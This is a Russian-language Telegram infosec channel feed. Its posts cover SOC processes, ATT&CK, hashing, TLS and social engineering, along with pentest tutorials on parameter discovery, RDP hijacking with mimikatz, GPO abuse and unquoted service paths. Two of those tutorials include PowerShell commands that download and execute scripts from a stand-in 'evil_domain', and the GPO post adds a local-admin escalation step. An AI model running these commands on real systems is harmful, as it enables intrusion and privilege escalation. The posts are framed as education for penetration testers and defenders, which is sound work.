REDtalk
1.07K subscribers
83 photos
1 video
11 files
98 links
Здесь вы найдете всё из мира ИБ. Говорим простыми словами о сложном. С нами кибербезопасность – ваш компаньон в цифровом мире. Вместе к безопасному будущему! 🌐🔐

По вопросам сотрудничества: @closed_character
Download Telegram
🧑‍💻Привет, друзья! На связи @closed_character

Сегодня мы поговорим о том, как искать скрытые (недекларируемые) параметры web-приложений. Это особенно актуально, когда мы сталкиваемся с "black box", т.е. когда нам неизвестно ничего о приложении. Иногда так много интересного скрыто от нас, но главная задача специалиста по тестированию на проникновение — умение видеть то, что обычному пользователю недоступно.

🛠️ Ручки это конечно здорово, но хороший пентестер - ленивый пентестер. Поэтому давайте поговорим о нескольких инструментах, которые помогут нам автоматизировать данный процесс:


1️⃣ Paraminer — мы уже писали о нем ранее. Отличный инструмент для поиска параметров в get и post запросах, а также скрытых заголовков. Особенно раскрывается с burp pro.


2️⃣ X8 — еще один мощный инструмент для поиска скрытых параметров, написаный на RUST и вобравший в себя все плюсы данного языка. Обладает широким набором функций для более глубокого анализа и обнаружения скрытых ресурсов, такими как исключение из поиска динамических строк, рекурсивный поиск, гибкая настройка отправки параметров за счет шаблонизатора.


x8 -u https://target_domain/index.php --cookie "session=xyz" --wordlist your_wordlist.txt



3️⃣ Arjun - это инструмент на Python, который предназначен для обнаружения скрытых параметров в HTTP-запросах. Он способен находить параметры в запросах GET/POST/POST-JSON/POST-XML и обеспечивает возможность импорта и экспорта данных из/в Burp Suite/Owasp ZAP. Однако, у него есть недостаток: фиксированное значение параметров при брутфорсе (по умолчанию 500), т.е одновременно будут отсылаться 500 параметров, что может привести к превышению ограничений некоторых серверов и вызвать ошибку "414 Request-URI Too Large”


arjun -u https://target_domain/index.php



4️⃣ Paramspider - это замечательный инструмент, который заслуживает внимания. В отличие от других упомянутых инструментов, он извлекает URL-адреса из веб-архивов, что позволяет обнаружить интересные параметры. Кроме того, он способен извлекать параметры из поддоменов.


paramspider -d target_domain

paramspider -l domains.txt


#REDtalk #BugBounty #hacking #pentest #кибербезопасность #cybersecurity
🔥91
💥 Привет! На связи @pyfffe

Поговорим про классификацию злоумышленников. Как их различают и создают модели. Зачем это нужно и работает ли это вообще?

Начнем с вопроса “Зачем?”🤔. В первую очередь это нужно для упрощения понимания того, как действует злоумышленник (он же хакер, он же Adversary). Классификация и модель угроз сильно помогает разработчикам ids/ips систем и аналитикам SOC. На основе придуманных моделей, о которых я напишу ниже, можно по различным отпечаткам понять кто, как и зачем проводит ту или иную атаку. Наверное, при слове “Модель злоумышленника” у всех на ум сразу приходит Mitre ATT&CK или Cyber Kill Chain.

Mitre ATT&CK — Это таблица (с модным названием “матрица”), которая содержит список тактик - того, чего добивается злоумышленник. Каждая тактика содержит список техник - того, как он этого добивается. Помимо этого, в матрице представлено ПО, используемое в каждой технике и классификацию APT, кто какие техники использует. Существует 3 матрицы - Каждая нацелена на свою область, а именно это корпоративная сеть, мобильные устройства и облачные технологии. При этом используемые тактики в них практически не отличаются, но вот техники разные.

Термин APT (Advanced Persistent Threat) был придуман ВВС США в 2006 году. Под ним понимается некая угроза ИБ, проводимая высококвалифицированной группировкой, обычно спонсируемой государствами. Их также пытаются классифицировать по различным признакам, например по используемому ПО и техникам. Из примеров можно назвать APT38 (Lazarus Group) и Ember Bear.

Помимо Mitre ATT&CK существует еще одна модель — Cyber Kill Chain 🔗. Как и написано в названии, она представляет собой модель цепочки атак из следующих шагов - разведка, вооружение, доставка, заражение, инсталляция, получение контроля и выполнение действий. Если злоумышленник выполнит все эти шаги, то система будет полностью скомпрометирована. Данная модель хорошо подходит для моделирования угроз. Её можно использовать в паре с Mitre ATT&CK.

Есть еще много документов, так или иначе пытающихся классифицировать хакеров. Но важно отметить, что хотя эти модели предоставляют ценные ресурсы, абсолютная точность может быть вызвана сложностью и быстротой эволюции киберугроз, требуя регулярного обновления и адаптации 🛡️.

#REDtalk #cybersecurity #ИБ #кибербезопасность #APT #SOC
🔥9👍3
Хороший процесс не может не родить результат...
©Анатолий Тосс

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

Как ранее договорились, приступаем к изучению процессов в SOC. Рассматривайте этот пост как анонс, так как, подумав на досуге, пришел к мнению о том, что детальное описание всего, что хочется Вам рассказать - это, наверное, всё-таки ближе к формату статей.👨🏻‍💻👨🏻‍💻

Как ранее уже упоминал, MITRE выделяет около 40 процессов в SOC. Нам же с Вами предлагаю чуть упростить задачу и рассмотреть процессы, объединенные в следующие блоки:
📍Мониторинг событий ИБ
📍Анализ инцидента ИБ
📍Реагирование на инцидент ИБ
📍Аналитика по инциденту ИБ
📍Проактивный поиск угроз
📍Киберкриминалистика
📍Контроль уязвимостей
📍Анализ защищенности
📍Эксплуатация СЗИ (средств защиты информации)
📍Security Awareness (повышение осведомленности сотрудников в части ИБ)

Каждый блок содержит в себе от 1 до 4 процессов, займемся их изучением, ну а по тем, что останутся из MITRE, можно будет сделать отдельный пост/статью (например, про процесс взаимодействия с общественностью и СМИ😁).

Также параллельно начнем рассматривать технические решения по ИБ, которые требуются для обеспечения каждого процесса.

Ну и начать предлагаю с блока "Мониторинг событий ИБ", а в части инструментария - с того, что называют "ядерной триадой SOC" - SIEM, EDR, NTA.🦾🦾

На этом удаляюсь готовить материал, а Вам желаю хороших выходных и максимально продуктивной недели.❤️

С любовью к процессам и Вам,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
🔥10👍31
💥 Привет! На связи @pyfffe

Как-то в начале зимы я захотел поиграть с антивирусами, понять, как они работают и как их обходить. И решил переписать мои наблюдения в статью. Но внезапно оказалось, что материала очень много 🤔, после чего я решил сделать не серию статей, но как минимум, разделить его на несколько частей.

И вот, спустя несколько месяцев, наконец сделал продолжение. Если первая часть была больше про теорию, то тут мы уже немного поиграем в хацкеров.

Приятного чтения! Ну а я пока возьму небольшой двухнедельный перерыв. Оставляю канал в надёжных руках @closed_character и @dolgihser

🔗 Часть 1. Немного теории о работе антивирусов
🔗 Часть 2. Немного практики по их обходу

#REDTalk #CyberSecurity #InfoSec #MalwareAnalysis #AVBypass #Redteam #ИБ #Кибербезопасность #Антивирусы
🔥12👏1
🔒 Привет, друзья! 👋 На связи @closed_character!

Сегодня я расскажу вам про боковое перемещение (Lateral Movement). 🛡️ Это тактика, которую хакеры применяют для постепенного продвижения по сети после взлома одной точки входа. Они ищут ценные данные или другие активы для утечки.

Один из таких методов - это захват сеанса RDP (RDP Session Hijacking). Если хакер получил полный контроль над системой (права SYSTEM), он может захватить сеанс RDP другого пользователя. Это позволяет ему обходить процесс поиска учетных данных этого пользователя.

Но что для этого нужно знать? Сначала неплохо бы посмотреть список сеансов. Это можно сделать двумя способами. Для любителей GUI: загляните в Диспетчер задач Windows на вкладку «Пользователи». Ну, и кстати, это менее заметный способ.

Второй способ - воспользоваться утилитой query. 🕵️‍♂️


query.exe user


А далее мы можем воспользоваться встроенной утилитой tscon. Она используется для управления сеансами пользователей RDP. С ее помощью можно перенаправить сеанс пользователя на другой сеанс, например, для перемещения сеанса пользователя с одного терминального сервера на другой. Сделать это можно следующей командой:


tscon.exe session_id /dest:session_name


Или можно воспользоваться mimikatz. 🔍


privilege::debug
token::elevate
ts::remote /id:session_id



Так что друзья, помните, что после завершения работы с удаленным рабочим столом (RDP), важно корректно завершить сеанс. Для этого необходимо кликнуть “ПУСК→ваш профиль→Выйти”

Подписывайтесь на канал, чтобы быть в курсе интересных тем из мира ИБ! И не забывайте, обеспечение безопасности - это дело каждого из нас. Давайте сделаем этот мир чуточку безопаснее🛡️🔐

#REDtalk #cybersecurity #pentest #redteam #кибербезопасность #purpleteam #ИБ
👍11👾1
Уж лучше совсем не помышлять об отыскании каких бы то ни было истин, чем делать это без всякого метода...
©Рене Декарт

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

В ходе выстраивания процессов SOC (по которым сейчас готовлю для Вас материалы) очень важно с заданной периодичностью определять текущее местоположение, динамику работы, и, конечно же, планирование того, что требуется делать дальше. Как Вы уже догадались, сегодня затронем тему методологии и стандартизации работы SOC.🚦📚

Любое управляемое развитие требует планирования и непрерывной оценки зрелости, и SOC здесь не исключение (вне зависимости от его типа). И тут перед нами встает вопрос: по каким критериям и как я могу оценить уровень зрелости, четко определить "тонкие" места, тормозящие развитие, и зафиксировать конкретные шаги, направленные на улучшение всей работы SOC? Иными словами, где взять такой опросник, который всё поможет однозначно определить? 🤔🤔

В своей работе для оценки работы моего подразделения я применяю и руководствуюсь моделью SOC-CMM. Она появилась в 2017 году как результат магистерской диссертации, написанной Робом ван Осом в ходе обучения в Лулеоском Технологическом Университете (LTU, Netherlands). SOC-CMM стала настолько популярной, что к сегодняшнему дню де-факто стала уже глобальным стандартом для оценки уровня зрелости SOC, который многие крупные компании используют для прохождения внутреннего аудита и сертификации. Ну а Роб ван Ос стал стратегическим советником по развитию многих центров мониторинга и реагирования на киберугрозы.🔥🔥

SOC-CMM представляет собой, если упрощенно, объемный "опросник", затрагивающий абсолютно все аспекты работы SOC. Есть 2 типа "опросников": basic и advanced. Я на текущий момент использую basic (на нынешнем этапе развития моего подразделения вполне достаточно). По результатам заполнения Вы получаете метрики всех областей работы, а также диаграмму "паутину", на которой наглядно показана работа (ну либо бездействие🙈) и четко видно, куда двигаться дальше. Отмечу, что прохождение таких аудитов "зрелости" - мероприятие достаточно объемное. Но если Вы сторонник непрерывного развития, то проводить его нужно обязательно.

В общем-то, это всё, чем хотел бы поделиться с Вами сегодня)) Надеюсь, что этим постом помогу Вам найти ответы на обозначенные Выше вопросы.🙏🏻🙏🏻

🔗Ссылка на официальный сайт SOC-CMM: https://soc-cmm.com/

С одержимостью к развитию,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
🔥10👍1
Привет, друзья! Сегодня у нас для вас отличный материал по анализу защищенности 1С! 🔍💻

Автор статьи проделал большую работу. Он собрал всю доступную информацию в одном месте, структурировал её и подтвердил на практике. 🕵

А пока мы готовим для вас кое-что крайне интересное 🤫, настоятельно рекомендуем ознакомиться с этой статьей!

📝 Ссылка на статью: https://ardent101.github.io/posts/1c/

#REDtalk #cybersecurity #pentest #redteam #1C
👍81
Учись так, будто тебе никогда не придется зарабатывать деньги, и работай так, будто ты никогда не учился...📚📚
©Уоррен Баффет

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

Пока готовится статья по Мониторингу событий ИБ, для разбавления информации - небольшой пост для тех наших коллег, кто только начинает знакомство с миром кибербезопасности🙌🏻

Если Вы, как и мои коллеги @closed_character и @pyfffe, склоняетесь к красно-синему миру ИБ, либо еще не определились с направлением в принципе (если в Вас живет прирожденный DevSecOps, я Вам искренне завидую🙈), хочу порекомендовать Вам пару бесплатных курсов, пройдя которые, Вы станете чуть ближе к принятию выбора относительно области ИБ, в которой хотите развиваться.🤓

1) Курс "Профессия - Белый Хакер" от CyberED.
Лично проходил данный курс и могу однозначно рекомендовать его. В ходе обучения пройдете полный путь атаки (от разведки по открытым источникам до захвата управления инфраструктурой), реализуя самостоятельно каждый этап на тестовых стендах. Научитесь анализировать трафик, имитировать атаки, эксплуатировать уязвимости. Дополнительный "плюсик в карму" создателям курса за большое количество материалов для самостоятельного изучения в каждом из уроков.

🔗Ссылка на курс: https://cyber-ed.ru/professiya-hacker/#form_block_id

2) Курс "Анализ защищенности веб-приложений" от Codeby Aademy.
Вводный курс для новичков, на котором будут разобраны популярнейшие уязвимости в веб-приложениях, которые предлагается изучать как со стороны атакующего, так и защитника. Курс достаточно небольшой, состоит из 5 уроков.

🔗Ссылка на курс: https://wasa.codeby.school/

Важно помнить, что вышеуказанные курсы не являются "волшебной кибер-таблеткой", после которых Вы станете супер-профи с уникальными навыками. Но опыт, который Вы приобретете, создаст Вам определенный фундамент для дальнейшего развития.👍🏻

Конечно, в открытом доступе есть специализированная литература, полигоны для кибер-учений и множество других материалов для саморазвития и повышения компетенций. Помните, что одно не заменяет другое, всегда пробуйте что-то новое и никогда не останавливайтесь в изучении, исследовании чего-то нового. И тогда всё получится.🙏🏻

С неутомимой тягой к знаниям,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
🔥12🫡31👎1
Привет, друзья! 🌟 На связи @closed_character! 💻

Групповые политики Windows (Group Policy Object) - как две стороны одной медали. Это мощный инструмент, который способен обеспечить надежную защиту вашей сети, но в то же время - мощное оружие для кибератак. 🛡️🔒

Почему это интересно для злоумышленника?

1. Повышение привилегий: Путем изменения групповых политик злоумышленники могут получить администраторские привилегии на компьютерах в сети. 🔑🚫
2. Распространение вредоносного ПО: Они могут использовать GPO для автоматического распространения вредоносного программного обеспечения по всей сети. 🦠💻

Сегодня я расскажу вам о GPO Abuse (злоупотребление групповыми политиками) - это техника, при которой злоумышленники используют групповые политики Windows для изменения настроек безопасности в сети, чтобы повысить свои привилегии или распространить вредоносное ПО. 🕵️‍♂️🛡️

Итак, как же это сделать:

Сначала стоит найти уязвимые GPO с возможностью записи. 🔍


Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}


Затем, следует перейти к папке SYSVOL и изменить находящиеся там файлы или создать новые. Конфигурационные файлы для каждого GPO хранятся по адресу:


\\DC_IP\SYSVOL\<домен>\Политика\<Уникальный идентификатор GPO>\



Однако, это не так просто. Необходимо выполнить несколько манипуляций, таких как изменение:

- значения атрибута “*gPCMachineExtensionNames*” объекта GPO;
- значения атрибута “*versionNumber*” объекта GPO;
- значения версии в файле GPT.ini .

Также необходимо знать GUID для изменяемых GPO.

Альтернативой может послужить SharpGPOAbuse.

SharpGPOAbuse: https://github.com/FSecureLABS/SharpGPOAbuse

Добавить пользователя в группу локальных администраторов


.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount test_user --GPOName "Vulnerable GPO"


Добавить задачу на доставку ПО


.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://evil_domain/not_mimikatz.exe'))" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com


Групповые политики - это мощный инструмент, который необходимо использовать осторожно. Понимание и контроль над ними - ключевые моменты для обеспечения безопасности вашей сети. 🚀🔒

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
🔥10👍4
💥 Привет, друзья! На связи @pyfffe

Хочу затронуть тему хеширования паролей.

Все мы знаем, что пароли на серверах и наших компьютерах хранятся не в 🔗 открытом, а в хешированном или даже зашифрованном виде. Однако, не все понимают важность выбора алгоритма.

Все мы также знаем, что md5 уже давно не является безопасной функцией, так как перестал являться криптостойким алгоритмом. Даже семейство алгоритмов SHA, несмотря на название расшифровку “Secure Hash Algorythm”, считается устаревшим.

Вместо этого необходимо применять алгоритмы, разработанные специально для хранения паролей. К примеру, Bcrypt или Yescrypt. Первый использует алгоритм шифрования blowfish, из-за чего скорость брутфорса его хешей сильно уменьшается. Второй, более новый, использует собственный алгоритм шифрования. То, что получается в результате “хеширования”, является не совсем хешем, а ключом, сформированным на основе заданного пароля🛡

У меня есть небольшая 🔗 статья по введению в брутфорс. В ней наглядно показано, почему нельзя использовать устаревшие алгоритмы хеширования. Рекомендую к прочтению 😊

Вывод: Использование надежных алгоритмов хеширования паролей, с солью и множеством итераций, является критически важным для обеспечения безопасности данных. Эти методы обеспечивают высокий уровень стойкости к атакам перебором паролей и защищают конфиденциальность паролей, предотвращая их утечку и несанкционированный доступ к системам и учетным записям пользователей.

#REDtalk #CyberSecurity #InfoSec #pentest #ИБ #Кибербезопасность
🔥13👏2
Привет, друзья! На связи @closed_character! 👋

Сегодня расскажу вам про “Path Interception by Unquoted Path”.

Что это такое и как это работает? 🤔

Если путь к исполняемому файлу службы содержит пробелы и не заключен в кавычки, Windows интерпретирует части пути до первого пробела, как имя исполняемого файла, а всё после первого пробела - как аргументы для него. Эта незначительная с виду ошибка может позволить злоумышленнику получить повышенные привилегии, если служба запускается от учетной записи с повышенными правами.

Давайте рассмотрим пример:


C:\Program Files\Vulner App\my app\test.exe


Как это интерпретирует система:


1) C:\Program.exe
2) C:\Program Files\Vulner.exe
3) C:\Program Files\Vulner App\my.exe
4) C:\Program Files\Vulner App\my app\test.exe


Мы можем поместить свой исполняемый файл на один из промежуточных путей с тем же именем. Например:


1) C:\Program.exe
2) C:\Program Files\Vulner.exe
3) C:\Program Files\Vulner App\my.exe



И когда служба запустится, выполнится наш исполняемый файл, а не исходный.

Как можно найти подобные ошибки 🔍 :


cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\\" |findstr /i /v """'



Либо воспользоваться скриптом PowerUp.ps1: https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1


powershell.exe' -exec bypass -command "IEX (New-Object Net.WebClient).DownloadString('http(s)://evil_domain/PowerUp.ps1');Get-ServiceUnquoted"


Чтобы избежать этой уязвимости необходимо заключать пути к исполняемым файлам в кавычки. Это гарантирует то, что Windows правильно интерпретирует весь путь как единое целое, даже если он содержит пробелы или специальные символы. 🛡️

#REDtalk #pentest #security #hacking #ИБ #cybersecurity #redteam #purpleteam #кибербезопасность
🔥8👍1🗿1
💥 Всем привет! На связи @pyfffe

Хочу поделится своим списком telegram-каналов, тем или иным образом связанными с информационной безопасностью.

P. S. Если что, это просто мой список. Реферальных ссылок нет, за рекламу никто не платил. 😉

1⃣ Начну с нескольких новостных. Anti Malware постят новостей на российском ИБ рынке и в мире бумажной безопасности;

2⃣ SecurityLabs - тоже новостной канал, но с немного техническим уклоном;

3⃣ Куда же без мемов. Information Security Memes постят забавные ИБ мемы;

4⃣ Естественно, одного мемного канала мало 😁 Вот еще один - RWPS;

Ну и закончу самым интересным - каналами, полностью направленными на техническую часть;

5⃣ RedTeam brazzers - Заметки пентестеров по Redteam-техникам;

6⃣ k8s security - Новости, уязвимости и защита по микросервисам;

7️⃣ Zer0Day Lab и Pwn3rzs - для “демонстрации” различных инструментов для красных и синих.

8️⃣ CyberSecurityTechnologies - Крупный канал, в котором публикуются PoC’и к уязвимостям, различный статьи, техники обхода всего, что только есть в мире. Рекомендую, если хотите почувствовать себя настоящими хацкерами. 🛡

Вроде всё, вот такой получился список. Как по мне, идеально для просмотра по утрам, перед работой. Жду критику и предложения в комментариях 😄

#REDTalk #redteam #cybersecurity #InfoSec #ИБ #кибербезопасность
👍9👾3🔥2
Совершенно разные, но при этом до невозможности близкие....👐🏻
©Эльчин Сафарли

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

В течение последнего времени моя команда начала часто сталкиваться с ситуацией, которая и послужила идеей для написания этого поста, а именно: нас начали путать с коллегами из NOC. Честно говоря, был уверен, что у нас в организации таких ситуаций удастся избежать, вопрос-то достаточно простой в решении. Но как же я был неправ😁

Итак, что же такое NOC, в чем отличие от SOC, и откуда взялась эта путаница?)

NOC (Network Operation Center) - в самом простом понимании это команда мониторинга и "алертинга". Хм, звучит очень схоже с SOC, да и аббревиатура практически такая же.🤔
В общем-то, вышеуказанное и послужило путаницей для сотрудников, не погруженных в глубокие различия ИТ и ИБ, что привело в итоге к тому, что мы некоторое короткое время являлись частью NOC-а))

Изначально, как видно из расшифровки, команды NOC занимались обеспечением бесперебойной работы на уровне сети, отвечая на доступность сервиса. К сегодняшнему дню NOC достаточно сильно трансформировался и теперь под целевой работой такого подразделения понимают и обработку алертов и оповещений от систем/сервисов/оборудования (т.е. обеспечение мониторинга и реагирования на работоспособность инфраструктуры, исходя из запросов бизнеса), и оказание тех. поддержки внешним пользователям и самим сотрудникам. Например, у нас NOC - это в принципе единое окно для взаимодействия со всеми подразделениями в нашей организации.👍🏻👍🏻

Как Вы уже поняли, верхне-уровнево NOC и SOC преследуют одну и ту же цель (обеспечение мониторинга и реагирования на нелегитимные события), и работают, можно сказать, по одному трафарету (соблюдение SLA, runbooks, несколько линий специалистов и т.д.). Разнятся области и сценарии.

Исходя из ситуации, с которой мы столкнулись, я лично на себе осознал, насколько важно задокументировать разграничение зон ответственности NOC и SOC (чем мы сейчас и занимаемся с коллегами). Настолько же важно грамотно доводить до коллег (особенно не погруженных в ИТ), в каких ситуациях и случаях им стоит обращаться в NOC, а в каких - в SOC. Да и целесообразно ли в принципе предоставлять коллегам возможность напрямую взаимодействовать и с NOC, и с SOC? Или лучше всё-таки оставить NOC единой точкой входа по работе со всеми обращениями? Вопрос дискуссионный, мы у себя еще не пришли к консенсусу. Но, не сомневаюсь, обязательно придем.🫡

Такой вот сегодня получился короткий и не сильно умудренный технически пятничный пост))

С пламенным приветом команде нашего NOC,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
👍10🫡2🔥1😁1
Привет, друзья! Завтра, в 13:00, у нашего друга Владимира Кочанова запланирован стрим с нашим автором и ведущим канала - Александром Негода. 🎥 Александр расскажет о довольно интересной теме - социотехническом тестировании. 🤔 Что это такое и почему это важно для ваших сотрудников? 🚀 Не пропустите возможность узнать ответы на эти вопросы и многое другое! 🌟

Ссылка на стрим:

https://t.me/sbprobiz?livestream
👍6🔥4
Друзья, Привет!

Несколько дней назад был опубликован 🔗 пост про CVE-2024-1086, позволяющей повысить привилегии пользователя Linux до Рута. Также к посту прилагается 🔗 PoC с прекомпилированным бинарником, что позволяет сразу протестировать уязвимость на своих системах (Осторожно, у нас некоторые машины вышли из строя, пришлось перезагружать!)

Скорее ставьте патчи, и да прибудет с нами безопасность🛡

#REDTalk #cybersecurity #exploit #cve #ИБ #кибербезопасность
👍7🔥2
Привет, друзья! 🌟🎉 

Недавно мы провели интересную беседу с Владимиром Кочановым на канале СБ Про Бизнес. Обсудили, что такое социотехническое тестирование и почему оно столь важно в контексте обеспечения информационной безопасности. 💻🔐

К сожалению, реальность такова, что требует не только внедрения передовых технических и программных решений, но и обучения сотрудников основам информационной безопасности. Ведь часто, как бы грубо это не прозвучало, слабое звено — это не технологии, а люди, становящиеся жертвами социотехнических атак. 👤⚠️

Кто не смог присоединиться к нам в эту среду, Владимир подготовил запись для вас! 🎥📝

Приятного просмотра и до новых встреч, друзья! 📺👋

Посмотреть видео можно по ссылкам:

RUTUBE

YouTube

VK

Дзен
🔥8👍4
Как мы можем требовать, чтобы кто-то сохранил нашу тайну, если мы сами не можем её сохранить....🤫🤫
©Франсуа де Ларошфуко

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

Сегодня хотел бы обсудить, пожалуй, один из самых популярных методов, используемых злоумышленниками для получения конфиденциальной информации, а именно: социальную инженерию. Причем обсудить в разрезе использования мессенджеров.📱

Думаю, не сделаю огромного открытия, если предположу, что практически каждый из Вас в качестве средства коммуникации для работы использует Telegram. Он удобен, он понятен, нам там очень комфортно. Да что там говорить, и я тоже большинство рабочих вопросов решаю через этот популярный мессенджер. Однако удобству использования в противовес идет и значительный риск, который заключается в том, что мы никак не контролируем этот канал обмена информацией с точки зрения информационной безопасности, т.е. обеспечения конфиденциальности.🤐

Именно с таким кейсом мы и столкнулись недавно: нашему сотруднику начал писать якобы ген. директор нашей компании (см. вложения). Казалось бы, всё очевидно и после первых же вопросов стоило свернуть все это общение, но тут вступает в дело психология: мы все очень разные и по-разному ведем себя в подобных ситуациях. Злоумышленники же очень здорово понимают элементы психологического воздействия и начинают сразу оказывать давление. Конкретно в нашем случае это выразилось в отправке фейковых документов от гос. органов. Хорошо, что наш коллега вовремя заподозрил неладное и незамедлительно обратился к нам. А если бы не заподозрил? Далее в дело вступил бы классический фишинг (злоумышленник спрашивает почту, определяет порядок ее оформления, например: первые буквы имени и отчества и далее фамилия + домен, после чего отправляет письмо с подменой e-mail отправителя, содержащее фишинговую ссылку либо документ).

Казалось бы, примитивнейшая ситуация, о которой все мы знаем. Но из года в год это работает, и очень успешно. По данным Positive Technologies, социальная инженерия используется в 92% кибератак на физлиц и в 37% кибератак на компании.🧑🏻‍💻

Конечно, прямым запретом использования популярных мессенджеров такую проблему не решить. В современном мире это практически невозможно (за исключением организаций и компаний, к которым предъявляются самые строгие требования в части обеспечения ИБ в целом и каналов коммуникации в частности). Слишком много удобных инструментов помимо общения сегодня предлагает тот же Telegram (боты, уведомляющие об алертах - наше всё😂).

Однако снизить риски можно.

Во-первых, в компании должен использоваться корпоративный мессенджер, который находится в контуре Вашей инфраструктуры и доступ к которому контролируется внутри Вашей организации.
Во-вторых, до всех сотрудников должно быть доведено (желательно под роспись с накладываемой на это ответственностью), что любая конфиденциальная информация (положение о конфиденциальной информации тоже бы здорово утвердить в организации) должна направляться только в корпоративном мессенджере.
В-третьих, в связи с популярностью вышеописанной ситуации, когда пишут от имени руководства, довести до сотрудников, что никто из руководителей им не будет писать лично (минуя всю орг. структуру компании).
В-четвертых, регулярное повышение сотрудников в части информационной безопасности. Это тот самый процесс Security Awareness, о котором упоминалось ранее в одном из постов. То есть четкое понимание, к кому обращаться и что делать.

Иными словами, сотрудники должны четко понимать линию разграничения между использованием Telegram и другими общедоступными мессенджерами (локальные чаты команд для мемов) и корпоративными каналами коммуникаций.

На этом у меня, в общем-то, всё. Если Вы также сталкивались с подобными случаями - поделитесь, мне тоже будет полезно узнать, как Вы их решали.

С соблюдением кибер-гигиены,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk
🔥10👍21
💥 Привет! на связи @pyfffe

Давайте немного осветим тему шифрования, а точнее сертификации.

Все мы знаем, что когда-то давно, до изобретения HTTPs, запросы по сети бегали преимущественно в открытом виде. Однако и после добавления уровня TLS в HTTP не все понимают, как его правильно использовать. Почему иногда в браузере рядом с URL стоит зеленый замочек, а иногда нет. Хотя в обоих случаях используется HTTPs? Разбираемся.

Не погружаясь в математику, TLS использует симметричное шифрование для шифрования HTTP-пакетов, но для создания того самого ключа, которым будет шифроваться трафик, клиенту и серверу необходимо сгенерировать, используя специальные алгоритмы. Перехватить его невозможно. Но есть нюанс 😈

Представим ситуацию, что наш компьютер с адресом 192.168.13.37 хочет открыть сайт www.wikipedia.org . Однако, так получилось, что между нами и сайтом обосновался хацкер 👾 Он, используя MiTM атаку, перехватывает все наши запросы. Создаёт TLS-соединение между нами и собой и еще одно TLS-соединение между ним и Википедией. таким образом, он может видеть весь наш (зашифрованный) трафик.

Чтобы это предотвратить, придумали сертификацию. Каждый сайт имеет так называемый сертификат - информация о ресурсе с цифровой подписью. При посещении сайта браузер смотрит на сертификат и проверяет подпись у центра сертификации - специального сервера, который выдал этот сертификат. Если всё правильно, то загорается желанный зеленый замочек около адресной строки, так как мы уверены, что никто не перехватил наше соединение. А даже если и перехватил, из-за сертификата он не сможет подменить ключи 🛡

Но возникает вопрос - а как нам удостовериться, что центр сертификации - тот, за кого себя выдаёт? Решили это просто - в нашей операционной системе по умолчанию уже лежит список доверенных центров сертификации, по которой она проверяет, валиден ли он или нет. Его можно редактировать, добавляя собственные центры или самоподписанные сертификаты.

Собственно, ответ на поставленный вопрос - Если замочек зеленый, значит соединение зашифровано и сертификат валиден. Если зачёркнутый - значит сертификат самоподписанный (созданный самим сайтом). В этом случае возможна атака Man In The Middle.

#cybersecurity #https #REDtalk #кибербезопасность #ИБ
👍6🔥3
❗️Alarm! У нас RCE в телеграме при скачивании файла. Патча еще нет. Для смягчения рекомендуется отключить автозагрузку файлов. (Но возможно это дизинформация ☺️)
🫡6👎1👾1